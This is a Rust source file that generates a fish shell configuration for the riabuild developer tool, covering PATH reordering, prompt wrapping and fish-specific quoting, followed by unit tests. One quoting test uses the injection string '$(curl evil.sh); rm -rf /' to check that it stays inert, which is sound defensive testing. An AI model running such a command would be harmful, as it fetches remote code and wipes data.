//! fish reads `$XDG_CONFIG_HOME/fish/config.fish`, so riabuild points
//! `XDG_CONFIG_HOME` at a directory of its own whose config sources the
//! developer's real one first.

use crate::Ctx;
use anyhow::Result;
use std::path::Path;

pub fn config(user_config_dir: &Path, environment: &str, banner: &str, prompt: &str) -> String {
    format!(
        r#"# Generated by riabuild. Edits here are overwritten.
#
# XDG_CONFIG_HOME is redirected for this session, so the developer's own fish
# configuration is sourced explicitly before riabuild adds anything.

if test -f "{user}/fish/config.fish"
    source "{user}/fish/config.fish"
end

{environment}

{prompt}

{banner}
"#,
        user = user_config_dir.display(),
    )
}

/// fish's spelling of [`super::environment_command`].
///
/// It needs its own because fish shares no syntax with the other two: `PATH` is
/// a real list rather than a colon-joined string, `set -gx` replaces `export`,
/// and there is no `${{var:+…}}`. The `for`/`contains` loop is the direct
/// translation of the strip-then-prepend the POSIX version does with a
/// pipeline — `fish_add_path --move` would be shorter, but it only arrived in
/// fish 3.2 and riabuild pins no fish version.
pub fn environment_command(env: &[(String, String)], dirs: &[String]) -> String {
    let lead: Vec<String> = dirs.iter().map(|dir| shell_quote(dir)).collect();
    let mut script = format!(
        r#"# riabuild's own environment, applied on top of the configuration above.
# The developer's config has already run, and prepending to PATH is the most
# common line in one — so riabuild's directories are moved back to the front
# here rather than left wherever that put them. What they added is kept.
set -l _riabuild_rest
for _riabuild_entry in $PATH
    if not contains -- $_riabuild_entry {lead}
        set -a _riabuild_rest $_riabuild_entry
    end
end
set -gx PATH {lead} $_riabuild_rest
set -e _riabuild_rest"#,
        lead = lead.join(" "),
    );
    for (name, value) in env {
        // Rebuilt above from the live value; restating the parent's would drop
        // whatever the developer's own config added to it.
        if name == "PATH" {
            continue;
        }
        script.push_str(&format!("\nset -gx {name} {}", shell_quote(value)));
    }
    script
}

/// Guarded on stdout being a terminal — see the note in `zsh::banner_command`.
pub fn banner_command(text: &str) -> String {
    format!("if isatty stdout\n    echo {}\nend", shell_quote(text))
}

/// Wraps the developer's `fish_prompt` instead of replacing it.
///
/// fish builds its prompt from a function rather than a variable, so there is
/// nothing to prepend to — the existing function is copied aside and called
/// from a new one that prints the prefix first. That also means fish needs no
/// per-render hook: the wrapper *is* the prompt.
///
/// The `_riabuild_inner_prompt` guard is load-bearing. Sourcing this file twice
/// without it would copy the wrapper onto itself, and the prompt would recurse
/// until fish gave up.
///
/// Known limitation: when the whole prompt is wider than the terminal, fish
/// truncates it from the left and replaces the overflow with `…`, so the
/// riabuild prefix is the first thing to go. Verified as a width effect alone —
/// the same prompt at 200 columns keeps it. Nothing to do about it short of
/// moving the marker to `fish_right_prompt`, which would be inconsistent with
/// the other two shells and truncates in its own way; at that width fish is
/// already mangling the developer's own prompt.
pub fn prompt_command(colour: bool) -> String {
    let prefix = if colour {
        format!(
            "set_color --bold blue\n    echo -n '{}'\n    set_color normal\n    echo -n ' '",
            super::PROMPT_LABEL
        )
    } else {
        format!("echo -n '{} '", super::PROMPT_LABEL)
    };
    format!(
        r#"if not functions -q _riabuild_inner_prompt
    if functions -q fish_prompt
        functions --copy fish_prompt _riabuild_inner_prompt
    else
        function _riabuild_inner_prompt
            echo -n '> '
        end
    end
end

function fish_prompt
    {prefix}
    _riabuild_inner_prompt
end"#
    )
}

/// Single-quotes a value **for fish**, which is not the POSIX rule
/// [`super::shell_quote`] implements and must not be folded into it.
///
/// POSIX single quotes admit no escapes at all, so the quote itself is the only
/// character with a special meaning inside them. fish's admit exactly two,
/// `\'` and `\\`, which makes the backslash special as well — and it has to be
/// escaped *first*, or the escapes this function adds become indistinguishable
/// from backslashes the value already had.
///
/// Doing the two replacements in the other order — which this did — is wrong in
/// both directions. A value ending in a backslash (`~/dir\`) emitted `'…\'`,
/// where the trailing backslash escapes the closing quote and leaves fish
/// parsing an unterminated string for the rest of `config.fish`, so the whole
/// environment silently fails to load. And a value with a doubled backslash in
/// it came back out with one, quietly.
fn shell_quote(text: &str) -> String {
    format!("'{}'", text.replace('\\', r"\\").replace('\'', r"\'"))
}

pub async fn prepare(
    ctx: &Ctx,
    prelude: &str,
    env: &[(String, String)],
) -> Result<super::ShellLaunch> {
    let root = ctx.paths.shell_dir("fish");
    let fish_dir = root.join("fish");
    tokio::fs::create_dir_all(&fish_dir).await?;

    let user_config_dir = std::env::var("XDG_CONFIG_HOME")
        .map(std::path::PathBuf::from)
        .unwrap_or_else(|_| ctx.paths.home().join(".config"));

    let colour = ctx.ui.colour();
    tokio::fs::write(
        fish_dir.join("config.fish"),
        config(
            &user_config_dir,
            &environment_command(env, &super::riabuild_path_dirs(ctx)),
            &banner_command(prelude),
            &prompt_command(colour),
        ),
    )
    .await?;

    Ok((
        vec!["-i".to_string()],
        vec![(
            "XDG_CONFIG_HOME".to_string(),
            root.to_string_lossy().into_owned(),
        )],
    ))
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::accounts::status::{Account, Identity};
    use crate::testing::ctx_with;
    use riabuild_runner::FakeRunner;

    #[test]
    fn a_backslash_is_escaped_before_the_quote_that_would_otherwise_swallow_it() {
        // The trailing-backslash case is the one that broke fish outright: the
        // old order emitted `'~/dir\'`, whose backslash escapes the closing
        // quote, so everything after it in `config.fish` was read as part of
        // the string.
        assert_eq!(shell_quote(r"~/dir\"), r"'~/dir\\'");
        // And the quiet one: a value carrying two backslashes came back with
        // one, because the pair fish collapses was never doubled.
        assert_eq!(shell_quote(r"a\\b"), r"'a\\\\b'");
        assert_eq!(shell_quote("it's"), r"'it\'s'");
        assert_eq!(
            shell_quote(r"back\slash and 'quote'"),
            r"'back\\slash and \'quote\''"
        );
        // Nothing else is touched. `$`, backticks and semicolons have no
        // meaning inside fish single quotes and must arrive verbatim.
        assert_eq!(
            shell_quote("$(curl evil.sh); rm -rf /"),
            "'$(curl evil.sh); rm -rf /'"
        );
    }

    #[tokio::test]
    async fn prepare_writes_the_prelude_into_the_generated_config() {
        // A test that only exercises `config` with a hand-picked literal, like
        // the ones below, cannot catch `prepare` wiring the wrong thing into
        // it. This one calls `prepare` itself and reads back the file it
        // wrote.
        let (ctx, _home) = ctx_with(FakeRunner::new()).await;
        let accounts = vec![Account {
            number: 1,
            id: "id-1".into(),
            identity: Identity::LoggedIn("clubria@proton.me".into()),
            tracked: false,
        }];
        let prelude = crate::shell::prelude(&accounts, riabuild_theme::Theme::plain(), None);

        prepare(&ctx, &prelude, &[]).await.unwrap();

        let written =
            tokio::fs::read_to_string(ctx.paths.shell_dir("fish").join("fish").join("config.fish"))
                .await
                .unwrap();
        // Distinctive to the box itself, not the banner — this fails if the
        // box is dropped, truncated, or swapped for the banner alone.
        assert!(written.contains("Your Claude Code accounts:"), "{written}");
        assert!(written.contains("clubria@proton.me"), "{written}");
    }

    #[test]
    fn sources_the_developers_fish_config_first() {
        let generated = config(Path::new("/Users/ada/.config"), "", "echo hi", "# prompt");
        let source_line = generated
            .find("source \"/Users/ada/.config/fish/config.fish\"")
            .unwrap();
        let banner_line = generated.find("echo hi").unwrap();
        assert!(source_line < banner_line, "{generated}");
        // The wrapper has to be defined after their fish_prompt exists, or
        // there would be nothing to copy aside.
        assert!(
            source_line < generated.find("# prompt").unwrap(),
            "{generated}"
        );
    }

    /// The third spelling of the same guarantee — see the bash test for what
    /// goes wrong without it.
    #[test]
    fn riabuilds_environment_is_applied_after_the_developers_config() {
        let generated = config(
            Path::new("/Users/ada/.config"),
            "set -gx RIABUILD_SHELL '1'",
            "echo hi",
            "# prompt",
        );
        let source_line = generated
            .find("source \"/Users/ada/.config/fish/config.fish\"")
            .unwrap();
        let environment_line = generated
            .find("set -gx RIABUILD_SHELL '1'")
            .expect("the environment block belongs in the generated config");
        assert!(source_line < environment_line, "{generated}");
    }

    #[test]
    fn the_environment_command_puts_riabuild_directories_back_in_front() {
        // fish PATH is a list, so the directories are separate elements rather
        // than a colon-joined string.
        let script = environment_command(
            &[("RIABUILD_SHELL".to_string(), "1".to_string())],
            &["/opt/rb/bin".to_string(), "/opt/rb/node/bin".to_string()],
        );
        assert!(
            script.contains("set -gx PATH '/opt/rb/bin' '/opt/rb/node/bin' $_riabuild_rest"),
            "{script}"
        );
        assert!(script.contains("set -gx RIABUILD_SHELL '1'"), "{script}");
    }

    #[test]
    fn the_environment_command_keeps_what_the_developer_added_to_path() {
        // Rebuilt from the live $PATH minus riabuild's own entries, so nvm,
        // cargo and their own ~/bin survive — and a re-source cannot stack a
        // second copy of riabuild's directories.
        let script = environment_command(&[], &["/opt/rb/bin".to_string()]);
        assert!(script.contains("for _riabuild_entry in $PATH"), "{script}");
        assert!(
            script.contains("contains -- $_riabuild_entry '/opt/rb/bin'"),
            "{script}"
        );
    }

    #[test]
    fn the_environment_command_never_restates_the_parents_path() {
        let script = environment_command(
            &[("PATH".to_string(), "/parent/path/only".to_string())],
            &["/opt/rb/bin".to_string()],
        );
        assert!(script.contains("set -gx PATH"), "{script}");
        assert!(!script.contains("/parent/path/only"), "{script}");
    }

    #[test]
    fn guards_against_a_missing_user_config() {
        let generated = config(Path::new("/Users/ada/.config"), "", "", "");
        assert!(generated.contains("if test -f"));
        assert!(generated.contains("end"));
    }

    #[test]
    fn the_banner_only_prints_to_a_terminal() {
        let command = banner_command("hi");
        assert!(command.starts_with("if isatty stdout\n"), "{command}");
        assert!(command.ends_with("\nend"), "{command}");
    }

    #[test]
    fn the_developers_prompt_is_wrapped_not_replaced() {
        let generated = prompt_command(true);
        assert!(
            generated.contains("functions --copy fish_prompt _riabuild_inner_prompt"),
            "{generated}"
        );
        assert!(
            generated.contains("_riabuild_inner_prompt\nend"),
            "{generated}"
        );
    }

    #[test]
    fn re_sourcing_cannot_make_the_prompt_recurse() {
        // Without this guard the second source copies riabuild's own wrapper
        // into _riabuild_inner_prompt, and the prompt calls itself forever.
        let generated = prompt_command(true);
        assert!(
            generated.contains("if not functions -q _riabuild_inner_prompt"),
            "{generated}"
        );
    }

    #[test]
    fn a_developer_with_no_prompt_function_still_gets_one() {
        let generated = prompt_command(false);
        assert!(
            generated.contains("function _riabuild_inner_prompt"),
            "{generated}"
        );
        assert!(generated.contains("echo -n '(riabuild) '"), "{generated}");
    }
}
